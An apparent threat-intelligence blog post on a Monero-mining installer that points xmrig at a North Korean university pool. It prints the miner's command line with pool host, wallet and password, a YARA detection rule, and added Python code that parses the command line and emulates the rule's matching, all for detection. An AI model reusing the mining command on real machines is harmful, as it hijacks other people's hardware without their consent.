North Korea needs Monero and is using you to mine it

 In Cryptocurrency, Exploits, Malware, News, Threat Intelligence

Monero is the 13th biggest cryptocurrency by value and has been sold as being more secure than bitcoin. At the time of writing, 1 Monero (XMR) was worth USD 318.16. With rising prices and a lack of tracking (unlike bitcoin, whose transactions can be traced through wallets), it's becoming a prime choice for criminals.

Screenshot from livecoinwatch.com

A piece of malware has been found, that places a mining application on a victim’s computer. It is an installer for software to mine the Monero crypto-currency. Any mined currency is sent to Kim Il Sung University in Pyongyang, North Korea.

Once the discovered installer is run, it copies a file named intelservice.exe to the system, which is often associated with cryptocurrency mining malware. The arguments the file is executed with reveal it is a piece of software called xmrig, a program already associated with wide campaigns exploiting unpatched IIS servers to mine Monero.

Analysis of the file revealed both the address of the Monero wallet and the password (KJU, a possible reference to Kim Jong-un) it uses, as well as the fact that it sends the mined currency to the server barjuok.ryongnamsan.edu[.]kp. The use of this domain reveals that the server is located at Kim Il Sung University.

The installer copies a file named intelservice.exe to the system. Judging by the arguments it's executed with, it's likely a piece of software called xmrig. The installer executes xmrig with the following command:

"-o barjuok.ryongnamsan.edu.kp:5615 -u 4JUdGzvrMFDWrUUwY... -p KJU" + processorCount + " -k -t " + (processorCount -1)

The installer passes xmrig the following arguments:

  • 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS is the address of the Monero wallet
  • ryongnamsan.edu[.]kp is the mining server that would receive any mined currency. The ryongnamsan.edu[.]kp domain indicates this server is located at Kim Il Sung University.
  • The password, KJU, is a possible reference to Kim Jong-un
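To show how a defender could pull these parameters out of a captured process command line and compare them with the indicators quoted above, here is an added Python example (not code from the original post or from the sample): it rebuilds the argument string the way the installer concatenates it, which is why the password comes out as "KJU" followed by the processor count.

```python
"""Parse an xmrig-style command line and flag the indicators quoted in this post."""
import shlex

# Values taken from the post above; the installer passes them to xmrig.
POOL_HOST = "barjuok.ryongnamsan.edu.kp"
WALLET = ("4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjk"
          "NrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS")

def build_cmdline(processor_count: int) -> str:
    """Reproduce the concatenation shown in the post: "KJU" + processorCount, threads = count - 1."""
    return (f"-o {POOL_HOST}:5615 -u {WALLET} -p KJU{processor_count}"
            f" -k -t {processor_count - 1}")

def parse_xmrig_args(cmdline: str) -> dict:
    """Extract -o host:port, -u wallet, -p password, -t threads and the -k keepalive flag."""
    args = {"pool": None, "port": None, "wallet": None, "password": None,
            "threads": None, "keepalive": False}
    toks, i = shlex.split(cmdline), 0
    while i < len(toks):
        tok = toks[i]
        val = toks[i + 1] if i + 1 < len(toks) else None
        if tok == "-k":
            args["keepalive"] = True
            i += 1
        elif tok == "-o" and val is not None:
            host, _, port = val.rpartition(":")
            args["pool"] = host or val
            args["port"] = int(port) if port.isdigit() else None
            i += 2
        elif tok in ("-u", "-p", "-t") and val is not None:
            key = {"-u": "wallet", "-p": "password", "-t": "threads"}[tok]
            args[key] = int(val) if tok == "-t" and val.isdigit() else val
            i += 2
        else:
            i += 1
    return args

def match_indicators(args: dict) -> list:
    """Return why this command line matches the post's indicators (empty list if it does not)."""
    reasons = []
    if args["pool"] and args["pool"].lower() == POOL_HOST:
        reasons.append("pool host " + POOL_HOST)
    if args["wallet"] == WALLET:
        reasons.append("wallet address from the post")
    # The installer appends the CPU count to "KJU", so match the prefix, not the whole value.
    if args["password"] and args["password"].upper().startswith("KJU"):
        reasons.append("password prefix KJU")
    return reasons
```

Feeding `build_cmdline(4)` through `parse_xmrig_args` yields password "KJU4" and 3 threads, and `match_indicators` reports all three indicators.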

The hostname barjuok.ryongnamsan.edu[.]kp doesn't currently resolve. That means the software can't send mined currency to the authors, at least on most networks. It may be that:

  • The application is designed to be run within another network, such as that of the university itself.
  • The address used to resolve but no longer exists.
  • The usage of a North Korean server is a prank to trick security researchers.

It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining.

On the one hand, the sample contains obvious debugging messages that an attacker would avoid. On the other, it contains fake filenames that appear to be an attempt to avoid detection of the installed mining software.

If the software author is at KSU, they may not be North Korean. KSU is an unusually open university, with a number of foreign students and lecturers.

There are two other pieces of software which share some code:

  • 762c3249904a8bf76802effb54426655
  • 42344bb45f351757e8638656e12a0135

Based on the compilation string, initial upload location and French text, it's likely the author of these two other samples is from Morocco. Therefore the software may have been created by entirely different authors who copied code from the same location, for example a forum.

Despite the sample being almost 11 days old, VirusTotal shows only 9 AV vendors have a signature for it.

AlienVault has published a YARA rule you can use to detect it:

rule nkminer_monero {
    meta:
        description = "Detects installer of Monero miner that points to a NK domain"
        author = "cdoman@alienvault.com"
        tlp = "white"
        license = "MIT License"

    strings:
        $a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" nocase wide ascii
        $b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" nocase wide ascii
        $c = "barjuok.ryongnamsan.edu.kp" nocase wide ascii
        $d = "C:\\SoftwaresInstall\\soft" nocase wide ascii
        $e = "C:\\Windows\\Sys64\\intelservice.exe" nocase wide ascii
        $f = "C:\\Windows\\Sys64\\updater.exe" nocase wide ascii
        $g = "C:\\Users\\Jawhar\\documents\\" nocase wide ascii

    condition:
        any of them
}
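To make concrete what the string modifiers in that rule do, here is an added Python example (not AlienVault's code, and not how YARA is implemented internally): it builds the byte patterns that "nocase wide ascii" implies for three of the rule's strings and scans a buffer that is constructed here, not taken from the real installer.

```python
"""Emulate the 'nocase wide ascii' matching of the rule above over a constructed buffer."""
import re

# Three of the rule's strings; YARA's "\\" escapes become single backslashes in Python raw strings.
RULE_STRINGS = {
    "$a": "82e999fb-a6e0-4094-aa1f-1a306069d1a5",
    "$c": "barjuok.ryongnamsan.edu.kp",
    "$e": r"C:\Windows\Sys64\intelservice.exe",
}

def nocase_pattern(s: str, wide: bool) -> bytes:
    """Byte regex for one string: letters match either case ('nocase'); 'wide' means
    UTF-16LE, so every character is followed by a NUL byte."""
    parts = []
    for ch in s:
        if ch.isalpha():
            piece = b"[" + ch.lower().encode() + ch.upper().encode() + b"]"
        else:
            piece = re.escape(ch.encode())
        parts.append(piece + (b"\x00" if wide else b""))
    return b"".join(parts)

def scan(buf: bytes) -> dict:
    """Map each matching identifier to a list of (offset, 'ascii' | 'wide') hits."""
    hits = {}
    for ident, s in RULE_STRINGS.items():
        for wide in (False, True):
            for m in re.finditer(nocase_pattern(s, wide), buf):
                hits.setdefault(ident, []).append((m.start(), "wide" if wide else "ascii"))
    return hits

def rule_matches(buf: bytes) -> bool:
    """The rule's condition is 'any of them': one hit on any string is enough."""
    return bool(scan(buf))

# Constructed sample buffer (not the real installer): the pool hostname stored upper-cased as a
# UTF-16LE string and the miner path in lower case as plain ASCII, surrounded by filler bytes.
SAMPLE = (b"\x00" * 16
          + "BARJUOK.RYONGNAMSAN.EDU.KP".encode("utf-16-le")
          + b"\x90" * 8
          + rb"c:\windows\sys64\intelservice.exe"
          + b"\x00" * 4)
CLEAN = b"MZ\x90\x00" + "nothing to see here".encode("utf-16-le")
```

Without the "wide" modifier the upper-cased UTF-16LE hostname would be missed, and without "nocase" the lower-cased path would be; `scan(SAMPLE)` reports both while `rule_matches(CLEAN)` is false.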

As usual, here are the indicators of compromise:



Header image from: ukrnames.com
